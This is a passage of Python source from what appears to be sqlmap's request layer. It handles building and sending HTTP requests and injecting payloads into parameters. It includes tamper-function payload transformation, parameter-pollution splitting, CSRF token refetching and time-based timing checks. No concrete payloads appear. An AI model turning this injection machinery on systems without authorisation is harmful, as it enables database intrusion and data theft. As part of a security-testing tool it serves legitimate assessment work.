                warnMsg += "and/or proxy switches ('--ignore-proxy', '--proxy',...)"
            singleTimeWarnMessage(warnMsg)

        elif conf.threads > 1:
            warnMsg = "if the problem persists please try to lower "
            warnMsg += "the number of used threads (option '--threads')"
            singleTimeWarnMessage(warnMsg)

        time.sleep(1)

        kwargs['retrying'] = True
        return Connect._getPageProxy(**kwargs)

    @staticmethod
    def _connReadProxy(conn):
        retVal = ""

        if not kb.dnsMode and conn:
            headers = conn.info()

            if headers and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\
              or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
                retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
                if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:
                    warnMsg = "large compressed response detected. Disabling compression"
                    singleTimeWarnMessage(warnMsg)
                    kb.pageCompress = False
            else:
                while True:
                    _ = conn.read(MAX_CONNECTION_CHUNK_SIZE)
                    if len(_) == MAX_CONNECTION_CHUNK_SIZE:
                        warnMsg = "large response detected. This could take a while"
                        singleTimeWarnMessage(warnMsg)
                        _ = re.sub(r"(?si)%s.+?%s" % (kb.chars.stop, kb.chars.start), "%s%s%s" % (kb.chars.stop, LARGE_CHUNK_TRIM_MARKER, kb.chars.start), _)
                        retVal += _
                    else:
                        retVal += _
                        break

                    if len(retVal) > MAX_CONNECTION_TOTAL_SIZE:
                        warnMsg = "too large response detected. Automatically trimming it"
                        singleTimeWarnMessage(warnMsg)
                        break

        return retVal

    @staticmethod
    def getPage(**kwargs):
        """
        This method connects to the target URL or proxy and returns
        the target URL page content
        """

        if isinstance(conf.delay, (int, float)) and conf.delay > 0:
            time.sleep(conf.delay)
        elif conf.cpuThrottle:
            cpuThrottle(conf.cpuThrottle)

        if conf.dummy:
            return randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())

        threadData = getCurrentThreadData()
        with kb.locks.request:
            kb.requestCounter += 1
            threadData.lastRequestUID = kb.requestCounter

        url = kwargs.get("url", None) or conf.url
        get = kwargs.get("get", None)
        post = kwargs.get("post", None)
        method = kwargs.get("method", None)
        cookie = kwargs.get("cookie", None)
        ua = kwargs.get("ua", None) or conf.agent
        referer = kwargs.get("referer", None) or conf.referer
        host = kwargs.get("host", None) or conf.host
        direct_ = kwargs.get("direct", False)
        multipart = kwargs.get("multipart", False)
        silent = kwargs.get("silent", False)
        raise404 = kwargs.get("raise404", True)
        timeout = kwargs.get("timeout", None) or conf.timeout
        auxHeaders = kwargs.get("auxHeaders", None)
        response = kwargs.get("response", False)
        ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout
        refreshing = kwargs.get("refreshing", False)
        retrying = kwargs.get("retrying", False)
        crawling = kwargs.get("crawling", False)
        skipRead = kwargs.get("skipRead", False)

        if not urlparse.urlsplit(url).netloc:
            url = urlparse.urljoin(conf.url, url)

        # flag to know if we are dealing with the same target host
        target = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], [url, conf.url or ""]))

        if not retrying:
            # Reset the number of connection retries
            threadData.retriesCount = 0

        # fix for known issue when urllib2 just skips the other part of provided
        # URL split with a space char while urlencoding it in the later phase
        url = url.replace(" ", "%20")

        conn = None
        code = None
        page = None

        _ = urlparse.urlsplit(url)
        requestMsg = u"HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET))
        requestMsg += ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling)) else url
        responseMsg = u"HTTP response "
        requestHeaders = u""
        responseHeaders = None
        logHeaders = u""
        skipLogTraffic = False

        raise404 = raise404 and not kb.ignoreNotFound

        # support for non-latin (e.g. cyrillic) URLs as urllib/urllib2 doesn't
        # support those by default
        url = asciifyUrl(url)

        # fix for known issues when using url in unicode format
        # (e.g. UnicodeDecodeError: "url = url + '?' + query" in redirect case)
        url = unicodeencode(url)

        try:
            socket.setdefaulttimeout(timeout)

            if direct_:
                if '?' in url:
                    url, params = url.split('?', 1)
                    params = urlencode(params)
                    url = "%s?%s" % (url, params)

            elif multipart:
                # Needed in this form because of potential circular dependency
                # problem (option -> update -> connect -> option)
                from lib.core.option import proxyHandler

                multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler)
                conn = multipartOpener.open(unicodeencode(url), multipart)
                page = Connect._connReadProxy(conn) if not skipRead else None
                responseHeaders = conn.info()
                responseHeaders[URI_HTTP_HEADER] = conn.geturl()
                page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))

                return page

            elif any((refreshing, crawling)):
                pass

            elif target:
                if conf.forceSSL and urlparse.urlparse(url).scheme != "https":
                    url = re.sub("\Ahttp:", "https:", url, re.I)
                    url = re.sub(":80/", ":443/", url, re.I)

                if PLACE.GET in conf.parameters and not get:
                    get = conf.parameters[PLACE.GET]

                    if not conf.skipUrlEncode:
                        get = urlencode(get, limit=True)

                if get:
                    url = "%s?%s" % (url, get)
                    requestMsg += "?%s" % get

                if PLACE.POST in conf.parameters and not post and method in (None, HTTPMETHOD.POST):
                    post = conf.parameters[PLACE.POST]

            elif get:
                url = "%s?%s" % (url, get)
                requestMsg += "?%s" % get

            requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str

            # Prepare HTTP headers
            headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer})

            if kb.authHeader:
                headers[HTTP_HEADER.AUTHORIZATION] = kb.authHeader

            if kb.proxyAuthHeader:
                headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader

            headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE
            headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"
            headers[HTTP_HEADER.HOST] = host or getHostHeader(url)

            if post is not None and HTTP_HEADER.CONTENT_TYPE not in headers:
                headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE)

            if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]:
                warnMsg = "missing 'boundary parameter' in '%s' header. " % HTTP_HEADER.CONTENT_TYPE
                warnMsg += "Will try to reconstruct"
                singleTimeWarnMessage(warnMsg)

                boundary = findMultipartPostBoundary(conf.data)
                if boundary:
                    headers[HTTP_HEADER.CONTENT_TYPE] = "%s; boundary=%s" % (headers[HTTP_HEADER.CONTENT_TYPE], boundary)

            if auxHeaders:
                for key, item in auxHeaders.items():
                    for _ in headers.keys():
                        if _.upper() == key.upper():
                            del headers[_]
                    headers[key] = item

            for key, item in headers.items():
                del headers[key]
                headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item, kb.pageEncoding)

            post = unicodeencode(post, kb.pageEncoding)

            if method:
                req = MethodRequest(url, post, headers)
                req.set_method(method)
            else:
                req = urllib2.Request(url, post, headers)

            requestHeaders += "\n".join("%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in req.header_items())

            if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:
                conf.cj._policy._now = conf.cj._now = int(time.time())
                cookies = conf.cj._cookies_for_request(req)
                requestHeaders += "\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies))

            if post is not None:
                if not getRequestHeader(req, HTTP_HEADER.CONTENT_LENGTH):
                    requestHeaders += "\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post))

            if not getRequestHeader(req, HTTP_HEADER.CONNECTION):
                requestHeaders += "\n%s: close" % HTTP_HEADER.CONNECTION

            requestMsg += "\n%s" % requestHeaders

            if post is not None:
                requestMsg += "\n\n%s" % getUnicode(post)

            requestMsg += "\n"

            threadData.lastRequestMsg = requestMsg

            logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)

            conn = urllib2.urlopen(req)

            if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower():
                kb.authHeader = getRequestHeader(req, HTTP_HEADER.AUTHORIZATION)

            if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION):
                kb.proxyAuthHeader = getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION)

            # Return response object
            if response:
                return conn, None, None

            # Get HTTP response
            if hasattr(conn, 'redurl'):
                page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\
                  else Connect._connReadProxy(conn)) if not skipRead else None
                skipLogTraffic = kb.redirectChoice == REDIRECTION.NO
                code = conn.redcode
            else:
                page = Connect._connReadProxy(conn) if not skipRead else None

            code = code or conn.code
            responseHeaders = conn.info()
            responseHeaders[URI_HTTP_HEADER] = conn.geturl()
            page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
            status = getUnicode(conn.msg)

            if extractRegexResult(META_REFRESH_REGEX, page) and not refreshing:
                url = extractRegexResult(META_REFRESH_REGEX, page)

                debugMsg = "got HTML meta refresh header"
                logger.debug(debugMsg)

                if kb.alwaysRefresh is None:
                    msg = "sqlmap got a refresh request "
                    msg += "(redirect like response common to login pages). "
                    msg += "Do you want to apply the refresh "
                    msg += "from now on (or stay on the original page)? [Y/n]"
                    choice = readInput(msg, default="Y")

                    kb.alwaysRefresh = choice not in ("n", "N")

                if kb.alwaysRefresh:
                    if url.lower().startswith('http://'):
                        kwargs['url'] = url
                    else:
                        kwargs['url'] = conf.url[:conf.url.rfind('/') + 1] + url

                    threadData.lastRedirectMsg = (threadData.lastRequestUID, page)
                    kwargs['refreshing'] = True
                    kwargs['get'] = None
                    kwargs['post'] = None

                    try:
                        return Connect._getPageProxy(**kwargs)
                    except SqlmapSyntaxException:
                        pass

            # Explicit closing of connection object
            if not conf.keepAlive:
                try:
                    if hasattr(conn.fp, '_sock'):
                        conn.fp._sock.close()
                    conn.close()
                except Exception, msg:
                    warnMsg = "problem occurred during connection closing ('%s')" % msg
                    logger.warn(warnMsg)

        except urllib2.HTTPError, e:
            page = None
            responseHeaders = None

            try:
                page = e.read() if not skipRead else None
                responseHeaders = e.info()
                responseHeaders[URI_HTTP_HEADER] = e.geturl()
                page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
            except socket.timeout:
                warnMsg = "connection timed out while trying "
                warnMsg += "to get error page information (%d)" % e.code
                logger.warn(warnMsg)
                return None, None, None
            except KeyboardInterrupt:
                raise
            except:
                pass
            finally:
                page = page if isinstance(page, unicode) else getUnicode(page)

            code = e.code
            threadData.lastHTTPError = (threadData.lastRequestUID, code)

            kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1

            status = getUnicode(e.msg)
            responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)

            if responseHeaders:
                logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items())

            logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]))

            skipLogTraffic = True

            if conf.verbose <= 5:
                responseMsg += getUnicode(logHeaders)
            elif conf.verbose > 5:
                responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])

            logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)

            if e.code == httplib.UNAUTHORIZED and not conf.ignore401:
                errMsg = "not authorized, try to provide right HTTP "
                errMsg += "authentication type and valid credentials (%d)" % code
                raise SqlmapConnectionException(errMsg)
            elif e.code == httplib.NOT_FOUND:
                if raise404:
                    errMsg = "page not found (%d)" % code
                    raise SqlmapConnectionException(errMsg)
                else:
                    debugMsg = "page not found (%d)" % code
                    singleTimeLogMessage(debugMsg, logging.DEBUG)
                    processResponse(page, responseHeaders)
            elif e.code == httplib.GATEWAY_TIMEOUT:
                if ignoreTimeout:
                    return None, None, None
                else:
                    warnMsg = "unable to connect to the target URL (%d - %s)" % (e.code, httplib.responses[e.code])
                    if threadData.retriesCount < conf.retries and not kb.threadException:
                        warnMsg += ". sqlmap is going to retry the request"
                        logger.critical(warnMsg)
                        return Connect._retryProxy(**kwargs)
                    elif kb.testMode:
                        logger.critical(warnMsg)
                        return None, None, None
                    else:
                        raise SqlmapConnectionException(warnMsg)
            else:
                debugMsg = "got HTTP error code: %d (%s)" % (code, status)
                logger.debug(debugMsg)

        except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, ProxyError, SqlmapCompressionException), e:
            tbMsg = traceback.format_exc()

            if "no host given" in tbMsg:
                warnMsg = "invalid URL address used (%s)" % repr(url)
                raise SqlmapSyntaxException(warnMsg)
            elif "forcibly closed" in tbMsg:
                warnMsg = "connection was forcibly closed by the target URL"
            elif "timed out" in tbMsg:
                if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
                    singleTimeWarnMessage("there is a possibility that the target (or WAF) is dropping 'suspicious' requests")
                warnMsg = "connection timed out to the target URL"
            elif "URLError" in tbMsg or "error" in tbMsg:
                warnMsg = "unable to connect to the target URL"
            elif "BadStatusLine" in tbMsg:
                warnMsg = "connection dropped or unknown HTTP "
                warnMsg += "status code received"
                if not conf.agent and not conf.randomAgent:
                    warnMsg += ". Try to force the HTTP User-Agent "
                    warnMsg += "header with option '--user-agent' or switch '--random-agent'"
            elif "IncompleteRead" in tbMsg:
                warnMsg = "there was an incomplete read error while retrieving data "
                warnMsg += "from the target URL"
            else:
                warnMsg = "unable to connect to the target URL"

            if "BadStatusLine" not in tbMsg:
                warnMsg += " or proxy"

            if silent:
                return None, None, None
            elif "forcibly closed" in tbMsg:
                logger.critical(warnMsg)
                return None, None, None
            elif ignoreTimeout and any(_ in tbMsg for _ in ("timed out", "IncompleteRead")):
                return None, None, None
            elif threadData.retriesCount < conf.retries and not kb.threadException:
                warnMsg += ". sqlmap is going to retry the request"
                logger.critical(warnMsg)
                return Connect._retryProxy(**kwargs)
            elif kb.testMode:
                logger.critical(warnMsg)
                return None, None, None
            else:
                raise SqlmapConnectionException(warnMsg)

        finally:
            if not isinstance(page, unicode):
                if HTTP_HEADER.CONTENT_TYPE in (responseHeaders or {}) and not re.search(TEXT_CONTENT_TYPE_REGEX, responseHeaders[HTTP_HEADER.CONTENT_TYPE]):
                    page = unicode(page, errors="ignore")
                else:
                    page = getUnicode(page)

            socket.setdefaulttimeout(conf.timeout)

        processResponse(page, responseHeaders)

        if conn and getattr(conn, "redurl", None):
            _ = urlparse.urlsplit(conn.redurl)
            _ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else ""))
            requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % getUnicode(_), requestMsg, 1)
            responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, conn.code, status)
        else:
            responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)

        if responseHeaders:
            logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items())

        if not skipLogTraffic:
            logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]))

        if conf.verbose <= 5:
            responseMsg += getUnicode(logHeaders)
        elif conf.verbose > 5:
            responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])

        logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)

        return page, responseHeaders, code

    @staticmethod
    def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True):
        """
        This method calls a function to get the target URL page content
        and returns its page MD5 hash or a boolean value in case of
        string match check ('--string' command line parameter)
        """

        if conf.direct:
            return direct(value, content)

        get = None
        post = None
        cookie = None
        ua = None
        referer = None
        host = None
        page = None
        pageLength = None
        uri = None
        code = None

        if not place:
            place = kb.injection.place or PLACE.GET

        if not auxHeaders:
            auxHeaders = {}

        raise404 = place != PLACE.URI if raise404 is None else raise404

        value = agent.adjustLateValues(value)
        payload = agent.extractPayload(value)
        threadData = getCurrentThreadData()

        if conf.httpHeaders:
            headers = OrderedDict(conf.httpHeaders)
            contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys())

            if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode:
                kb.postUrlEncode = False
                conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType]
                contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE)
                conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType))

        if payload:
            if kb.tamperFunctions:
                for function in kb.tamperFunctions:
                    try:
                        payload = function(payload=payload, headers=auxHeaders)
                    except Exception, ex:
                        errMsg = "error occurred while running tamper "
                        errMsg += "function '%s' ('%s')" % (function.func_name, ex)
                        raise SqlmapGenericException(errMsg)

                    if not isinstance(payload, basestring):
                        errMsg = "tamper function '%s' returns " % function.func_name
                        errMsg += "invalid payload type ('%s')" % type(payload)
                        raise SqlmapValueException(errMsg)

                value = agent.replacePayload(value, payload)

            logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload))

            if place == PLACE.CUSTOM_POST and kb.postHint:
                if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
                    # payloads in SOAP/XML should have chars > and < replaced
                    # with their HTML encoded counterparts
                    payload = payload.replace('>', "&gt;").replace('<', "&lt;")
                elif kb.postHint == POST_HINT.JSON:
                    if payload.startswith('"') and payload.endswith('"'):
                        payload = json.dumps(payload[1:-1])
                    else:
                        payload = json.dumps(payload)[1:-1]
                elif kb.postHint == POST_HINT.JSON_LIKE:
                    payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
                    if payload.startswith('"') and payload.endswith('"'):
                        payload = json.dumps(payload[1:-1])
                    else:
                        payload = json.dumps(payload)[1:-1]
                    payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
                value = agent.replacePayload(value, payload)
            else:
                # GET, POST, URI and Cookie payload needs to be thoroughly URL encoded
                if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode:
                    payload = urlencode(payload, '%', False, place != PLACE.URI)  # spaceplus is handled down below
                    value = agent.replacePayload(value, payload)

            if conf.hpp:
                if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)):
                    warnMsg = "HTTP parameter pollution should work only against "
                    warnMsg += "ASP(.NET) targets"
                    singleTimeWarnMessage(warnMsg)

                if place in (PLACE.GET, PLACE.POST):
                    _ = re.escape(PAYLOAD_DELIMITER)
                    match = re.search("(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value)
                    if match:
                        payload = match.group("value")

                        for splitter in (urlencode(' '), ' '):
                            if splitter in payload:
                                prefix, suffix = ("*/", "/*") if splitter == ' ' else (urlencode(_) for _ in ("*/", "/*"))
                                parts = payload.split(splitter)
                                parts[0] = "%s%s" % (parts[0], suffix)
                                parts[-1] = "%s%s=%s%s" % (DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[-1])

                                for i in xrange(1, len(parts) - 1):
                                    parts[i] = "%s%s=%s%s%s" % (DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[i], suffix)

                                payload = "".join(parts)

                        for splitter in (urlencode(','), ','):
                            payload = payload.replace(splitter, "%s%s=" % (DEFAULT_GET_POST_DELIMITER, match.group("name")))

                        value = agent.replacePayload(value, payload)
                else:
                    warnMsg = "HTTP parameter pollution works only with regular "
                    warnMsg += "GET and POST parameters"
                    singleTimeWarnMessage(warnMsg)

        if place:
            value = agent.removePayloadDelimiters(value)

        if PLACE.GET in conf.parameters:
            get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value

        if PLACE.POST in conf.parameters:
            post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value

        if PLACE.CUSTOM_POST in conf.parameters:
            post = conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value
            post = post.replace(ASTERISK_MARKER, '*') if post else post

        if PLACE.COOKIE in conf.parameters:
            cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value

        if PLACE.USER_AGENT in conf.parameters:
            ua = conf.parameters[PLACE.USER_AGENT] if place != PLACE.USER_AGENT or not value else value

        if PLACE.REFERER in conf.parameters:
            referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value

        if PLACE.HOST in conf.parameters:
            host = conf.parameters[PLACE.HOST] if place != PLACE.HOST or not value else value

        if PLACE.URI in conf.parameters:
            uri = conf.url if place != PLACE.URI or not value else value
        else:
            uri = conf.url

        if value and place == PLACE.CUSTOM_HEADER:
            auxHeaders[value.split(',')[0]] = value.split(',', 1)[1]

        if conf.csrfToken:
            def _adjustParameter(paramString, parameter, newValue):
                retVal = paramString
                match = re.search("%s=(?P<value>[^&]*)" % re.escape(parameter), paramString)
                if match:
                    origValue = match.group("value")
                    retVal = re.sub("%s=[^&]*" % re.escape(parameter), "%s=%s" % (parameter, newValue), paramString)
                return retVal

            page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
            match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % re.escape(conf.csrfToken), page or "")
            token = (match.group(2) or match.group(3) or match.group(4)) if match else None

            if not token:
                if conf.csrfUrl != conf.url and code == httplib.OK:
                    if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""):
                        token = page

                if not token and any(_.name == conf.csrfToken for _ in conf.cj):
                    for _ in conf.cj:
                        if _.name == conf.csrfToken:
                            token = _.value
                            if not any (conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))):
                                if post:
                                    post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)
                                elif get:
                                    get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)
                                else:
                                    get = "%s=%s" % (conf.csrfToken, token)
                            break

                if not token:
                    errMsg = "CSRF protection token '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url)
                    if not conf.csrfUrl:
                        errMsg += ". You can try to rerun by providing "
                        errMsg += "a valid value for option '--csrf-url'"
                    raise SqlmapTokenException, errMsg

            if token:
                for place in (PLACE.GET, PLACE.POST):
                    if place in conf.parameters:
                        if place == PLACE.GET and get:
                            get = _adjustParameter(get, conf.csrfToken, token)
                        elif place == PLACE.POST and post:
                            post = _adjustParameter(post, conf.csrfToken, token)

                for i in xrange(len(conf.httpHeaders)):
                    if conf.httpHeaders[i][0].lower() == conf.csrfToken.lower():
                        conf.httpHeaders[i] = (conf.httpHeaders[i][0], token)

        if conf.rParam:
            def _randomizeParameter(paramString, randomParameter):
                retVal = paramString
                match = re.search("%s=(?P<value>[^&;]+)" % re.escape(randomParameter), paramString)
                if match:
                    origValue = match.group("value")
                    retVal = re.sub("%s=[^&;]+" % re.escape(randomParameter), "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)
                return retVal

            for randomParameter in conf.rParam:
                for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
                    if item in conf.parameters:
                        if item == PLACE.GET and get:
                            get = _randomizeParameter(get, randomParameter)
                        elif item == PLACE.POST and post:
                            post = _randomizeParameter(post, randomParameter)
                        elif item == PLACE.COOKIE and cookie:
                            cookie = _randomizeParameter(cookie, randomParameter)

        if conf.evalCode:
            delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER
            variables = {"uri": uri}
            originals = {}

            for item in filter(None, (get, post if not kb.postHint else None)):
                for part in item.split(delimiter):
                    if '=' in part:
                        name, value = part.split('=', 1)
                        value = urldecode(value, convall=True, plusspace=(item==post and kb.postSpaceToPlus))
                        evaluateCode("%s=%s" % (name.strip(), repr(value)), variables)

            if cookie:
                for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER):
                    if '=' in part:
                        name, value = part.split('=', 1)
                        value = urldecode(value, convall=True)
                        evaluateCode("%s=%s" % (name.strip(), repr(value)), variables)

            originals.update(variables)
            evaluateCode(conf.evalCode, variables)
            uri = variables["uri"]

            for name, value in variables.items():
                if name != "__builtins__" and originals.get(name, "") != value:
                    if isinstance(value, (basestring, int)):
                        found = False
                        value = unicode(value)

                        regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter))
                        if re.search(regex, (get or "")):
                            found = True
                            get = re.sub(regex, "\g<1>%s\g<3>" % value, get)

                        if re.search(regex, (post or "")):
                            found = True
                            post = re.sub(regex, "\g<1>%s\g<3>" % value, post)

                        regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), name, re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER))
                        if re.search(regex, (cookie or "")):
                            found = True
                            cookie = re.sub(regex, "\g<1>%s\g<3>" % value, cookie)

                        if not found:
                            if post is not None:
                                post += "%s%s=%s" % (delimiter, name, value)
                            elif get is not None:
                                get += "%s%s=%s" % (delimiter, name, value)
                            elif cookie is not None:
                                cookie += "%s%s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, name, value)

        if not conf.skipUrlEncode:
            get = urlencode(get, limit=True)

        if post is not None:
            if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE):
                post = getattr(post, UNENCODED_ORIGINAL_VALUE)
            elif kb.postUrlEncode:
                post = urlencode(post, spaceplus=kb.postSpaceToPlus)

        if timeBasedCompare:
            if len(kb.responseTimes) < MIN_TIME_RESPONSES:
                clearConsoleLine()

                if conf.tor:
                    warnMsg = "it's highly recommended to avoid usage of switch '--tor' for "
                    warnMsg += "time-based injections because of its high latency time"
                    singleTimeWarnMessage(warnMsg)

                warnMsg = "[%s] [WARNING] time-based comparison requires " % time.strftime("%X")
                warnMsg += "larger statistical model, please wait"
                dataToStdout(warnMsg)

                while len(kb.responseTimes) < MIN_TIME_RESPONSES:
                    Connect.queryPage(content=True)
                    dataToStdout('.')

                dataToStdout("\n")

            elif not kb.testMode:
                warnMsg = "it is very important not to stress the network adapter "
                warnMsg += "during usage of time-based payloads to prevent potential "
                warnMsg += "errors "
                singleTimeWarnMessage(warnMsg)

            if not kb.laggingChecked:
                kb.laggingChecked = True

                deviation = stdev(kb.responseTimes)

                if deviation > WARN_TIME_STDEV:
                    kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE

                    warnMsg = "considerable lagging has been detected "
                    warnMsg += "in connection response(s). Please use as high "
                    warnMsg += "value for option '--time-sec' as possible (e.g. "
                    warnMsg += "10 or more)"
                    logger.critical(warnMsg)

        if conf.safUrl and conf.saFreq > 0:
            kb.queryCounter += 1
            if kb.queryCounter % conf.saFreq == 0:
                Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host)

        start = time.time()

        if kb.nullConnection and not content and not response and not timeBasedCompare:
            noteResponseTime = False

            pushValue(kb.pageCompress)
            kb.pageCompress = False

            if kb.nullConnection == NULLCONNECTION.HEAD:
                method = HTTPMETHOD.HEAD
            elif kb.nullConnection == NULLCONNECTION.RANGE:
                auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1"

            _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))

            if headers:
                if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers:
                    pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH])
                elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers:
                    pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:])

            kb.pageCompress = popValue()

        if not pageLength:
            try:
